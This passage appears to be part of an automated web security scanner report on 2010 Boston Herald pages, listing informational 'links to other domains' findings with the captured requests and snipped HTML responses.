<p class="MsoNormal">(image via <a href="http://images.nymag.com/images/2/daily/2010/11/05_privatepractice_560x375.jpg" target="_blank">nymag.com</a>
...[SNIP]...
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="384" height="283" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="align" value="middle" />
...[SNIP]...
<param name="src" value="http://widget.nbc.com/videos/nbcshort_at.swf?CXNID=1000004.10045NXC&widID=4727a250e66f9723&clipID=805561&showID=61" /><embed type="application/x-shockwave-flash" width="384" height="283" src="http://widget.nbc.com/videos/nbcshort_at.swf?CXNID=1000004.10045NXC&widID=4727a250e66f9723&clipID=805561&showID=61" bgcolor="#000000" quality="high" allowfullscreen="true" allowscriptaccess="always" align="middle"></embed>
...[SNIP]...
<p style="text-align: center;">(via <a href="http://www.yasrsly.com/starbuck-barista-sterotypes-customers/8070/" target="_blank">YASRLY</a>
...[SNIP]...
<p style="text-align: center;"><a href="http://kidsclothesclub.org/"><img class="aligncenter size-full wp-image-2200" title="jill" src="http://bostonherald.com/blogs/entertainment/the_assistant/wp-content/uploads/2010/11/jill.jpg" alt="" width="500" height="772" />
...[SNIP]...
<p style="text-align: left;">The <a href="http://www.kidsclothesclub.org" target="_blank">Kids Clothes Club</a>
...[SNIP]...
</strong> this weekend. If you purchase a ticket, you’re guaranteed the 20% discount and entrance to a tres-chic party at the Wintergarden featuring cocktails and food by <a href="http://www.thecateredaffair.com" target="_blank">The Catered Affair</a>
...[SNIP]...
<td style="padding:2px 1px 0px 5px;"><a style="color:#333; text-decoration:none; font-weight:bold;" href="http://www.colbertnation.com" target="_blank">The Colbert Report</a>
...[SNIP]...
<td style="padding:2px 1px 0px 5px;" colspan="2"><a style="color:#333; text-decoration:none; font-weight:bold;" href="http://www.colbertnation.com/the-colbert-report-videos/364519/november-04-2010/exclusive---elvis-costello---all-i-have-to-do-is-dream" target="_blank">Exclusive - Elvis Costello - All I Have to Do Is Dream</a>
...[SNIP]...
<td style="padding: 2px 5px 0px; overflow: hidden; width: 360px; text-align: right;" colspan="2"><a style="color:#96deff; text-decoration:none; font-weight:bold;" href="http://www.colbertnation.com/" target="_blank">www.colbertnation.com</a>
...[SNIP]...
<td style="padding:0px;" colspan="2"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="360" height="301" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="bgcolor" value="#000000" />
...[SNIP]...
<param name="wmode" value="window" /><embed type="application/x-shockwave-flash" width="360" height="301" src="http://media.mtvnservices.com/mgid:cms:item:comedycentral.com:364519" wmode="window" flashvars="autoPlay=false" bgcolor="#000000"></embed>
...[SNIP]...
<td style="padding: 3px; width: 33%;"><a style="font:10px arial; color:#333; text-decoration:none;" href="http://www.colbertnation.com/full-episodes/" target="_blank">Colbert Report Full Episodes</a>
...[SNIP]...
<td style="padding: 3px; width: 33%;"><a style="font:10px arial; color:#333; text-decoration:none;" href="http://www.indecisionforever.com/" target="_blank">2010 Election</a>
...[SNIP]...
<td style="padding: 3px; width: 33%;"><a style="font:10px arial; color:#333; text-decoration:none;" href="http://www.colbertnation.com/video/tag/March%20to%20Keep%20Fear%20Alive" target="_blank">March to Keep Fear Alive</a>
...[SNIP]...
<p>(via <a href="http://ccinsider.comedycentral.com/2010/11/05/exclusive-stephen-colbert-and-elvis-costello-duet/" target="_blank">Comedy Central</a>
...[SNIP]...
<param name="allowScriptAccess" value="always"><embed src="http://www.youtube.com/v/IwfwgbZPZ9w?version=3" type="application/x-shockwave-flash" allowfullscreen="true" allowScriptAccess="always" width="640" height="390"></object>
...[SNIP]...
<p>(Youtube via <a href="http://tv.gawker.com/5679902/jon-stewart-at-the-1994-boston-college-fest" target="_blank">Gawker tv</a>
...[SNIP]...
<p>For more info on the event or to find tickets, visit the website <a href="http://www.jlboston.org/jlb/npo.jsp?pg=support6" target="_blank">here</a>
...[SNIP]...
<font class=bodyFont color=#333333>

<img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg?sdf=sdfs" style="float:left">


<strong>
...[SNIP]...
<a href=http://bostonherald.com/blogs/entertainment/the_assistant/?feed=rss2><img src=http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif border=0></a>
...[SNIP]...

8.3. http://bostonherald.com/blogs/lifestyle/fork_lift/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/lifestyle/fork_lift/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/blogs/lifestyle/fork_lift/?p=2367

The response contains the following links to other domains:

http://cache.heraldinteractive.com/CSS/dropdown.css
http://cache.heraldinteractive.com/CSS/index.css
http://cache.heraldinteractive.com/CSS/subnavigation.css
http://cache.heraldinteractive.com/CSS/tabbed.css
http://cache.heraldinteractive.com/CSS/universal.css
http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg
http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_662x120.jpg
http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif
http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/donnaGoodison.gif?123=4234
http://cache.heraldinteractive.com/images/siteImages/reporters/juliaRappaport.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/kerryByrne.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/matSchaffer_phantom.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif
http://coldhardfootballfacts.com/
http://feeds.feedburner.com/bostonherald/
http://sportsillustrated.cnn.com/writers/kerry_byrne/archive/
http://twitter.com/Julia_Rappaport
http://www.backbaysocialclub.com/
http://www.carfind.com/
http://www.homefind.com/
http://www.scampoboston.com/
http://www.sonsieboston.com/
http://www.summershackrestaurant.com/

Request

GET /blogs/lifestyle/fork_lift/?p=2367 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:20:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/lifestyle/fork_lift/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />

   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="/blogs/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />News & Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift/"><img width="638" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_662x120.jpg" /></a>
...[SNIP]...
<p>Check out my review of <a href="http://www.backbaysocialclub.com">Back Bay Social Club</a> in <a href="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105.jpg"><img class="alignright size-medium wp-image-2368" title="efd7c5_ltpback20101105" src="http://cache.heraldinteractive.com/blogs/lifestyle/fork_lift/wp-content/uploads/2010/11/efd7c5_ltpback20101105-300x261.jpg" alt="" width="300" height="261" /></a>
...[SNIP]...
</a>. It’s the latest restaurant from former night club king Patrick Lyons’s Lyons Group–which is behind such eateries as Towne, <a href="http://www.scampoboston.com">Scampo</a>, <a href="http://www.sonsieboston.com">Sonsie</a> and <a href="http://www.summershackrestaurant.com">Jasper White’s Summer Shack</a>
...[SNIP]...
<br />

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/kerryByrne.gif" style="float:left; border: 1px #000 solid;">

<b>
...[SNIP]...
is career here
writing one of the nation's first newspaper beer columns. In his spare time,
he pens thoughtful Buffalo wing-themed haiku and publishes the critically
acclaimed <a href="http://ColdHardFootballFacts.com">ColdHardFootballFacts.com</a>. Kerry also writes for <a href="http://sportsillustrated.cnn.com/writers/kerry_byrne/archive/">SportsIllustrated.com</a>
...[SNIP]...
</div>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/donnaGoodison.gif?123=4234" style="float:left; border: 1px #000 solid;">
<b>
...[SNIP]...
</div>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/juliaRappaport.gif" style="float:left; border: 1px #000 solid">

<b>
...[SNIP]...
</b> is Assistant Arts and Lifestyle Editor at the Boston Herald,
where she writes the Sips column. An aspiring bon vivant, you can follow her
work and play at <a href="http://twitter.com/Julia_Rappaport">twitter.com/ Julia_Rappaport</a>
...[SNIP]...
<br>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/matSchaffer_phantom.gif" style="float:left; border: 1px #000 solid;">

<b>
...[SNIP]...
<a href=http://bostonherald.com/blogs/lifestyle/fork_lift/?feed=rss2><img src=http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif border=0></a>
...[SNIP]...

8.4. http://bostonherald.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/business/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/blogLogos/getting_real.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/ticker.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/workingStiff.gif
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/business
http://feeds.feedburner.com/bostonherald/business/
http://feeds.feedburner.com/bostonherald/business/automotive
http://feeds.feedburner.com/bostonherald/business/general
http://feeds.feedburner.com/bostonherald/business/healthcare
http://feeds.feedburner.com/bostonherald/business/media
http://feeds.feedburner.com/bostonherald/business/real_estate
http://feeds.feedburner.com/bostonherald/business/technology
http://feeds.feedburner.com/bostonherald/business/technology/reviews
http://feeds.feedburner.com/bostonherald/business/womens
http://feeds.feedburner.com/bostonherald/jobfind/news/your_career
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/AZList.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/FundRank.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/HighLow.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/IndexReturns.html?CN=AP707&idx=3&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/StockRank.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/external/ibd.morningstar.com/etfreturns/ETFReturns.html?CN=AP707&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports
http://multimedia.heraldinteractive.com/images/20101105/stp/64052d_qantas11052010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/20ad74_SBiz_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/3ef2c1_Segs_11072010.JPG
http://multimedia.heraldinteractive.com/images/20101107/stp/bc9344_coak_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/c751fe_ltpkeith20101107.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/d24c15_pola2_11082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html
http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=1&prodtype=M&thisponsor=cf1&ad=mtg&nav=mtg30year_graph&page=default
http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=15&prodtype=D&ad=dep&nav=1yearcd_graph&page=default
http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=39&prodtype=A&ad=auto&nav=48mo_newcar_graph&page=default
http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=50&prodtype=L&ad=loan&nav=heloc30k_graph&page=default
http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif
http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif
http://www.bankrate.com/brm/images/brm_nd/bullet.gif
http://www.bankrate.com/brm/images/brm_nd/graph.gif
http://www.bankrate.com/finance/mortgages/bankrate-com-averages.aspx?pid=p:bhn
http://www.bankrate.com/funnel/auto/?pid=p:bhn&prods=39
http://www.bankrate.com/funnel/cd-investments/?pid=p:bhn&prods=15&local=true
http://www.bankrate.com/funnel/home-equity/?pid=p:bhn&prods=50
http://www.bankrate.com/funnel/mortgages/?pid=p:bhn&prods=1
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.feedburner.com/fb/a/feed101
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /business/?srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:51:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 84874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="Business - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

8.5. http://bostonherald.com/business/general/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/general/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/business/general/view.bg?articleid=1294575&srvc=home&position=comment

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2Fview.bg%3Farticleid%3D1294575%26srvc%3Drss&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/business/general/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20101106/3ef2c1_Segs_11072010.JPG
http://multimedia.heraldinteractive.com/images/20101106/stp/fa0e8a_Fite_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/4479a3_Bs_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/eb101e_cam_11082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/players.aspx?id=740,pos=G,team=121,Type=Regular
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nhl/teams/121/teamstats.aspx?team=121
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /business/general/view.bg?articleid=1294575&srvc=home&position=comment HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:56:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2Fview.bg%3Farticleid%3D1294575%26srvc%3Drss&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
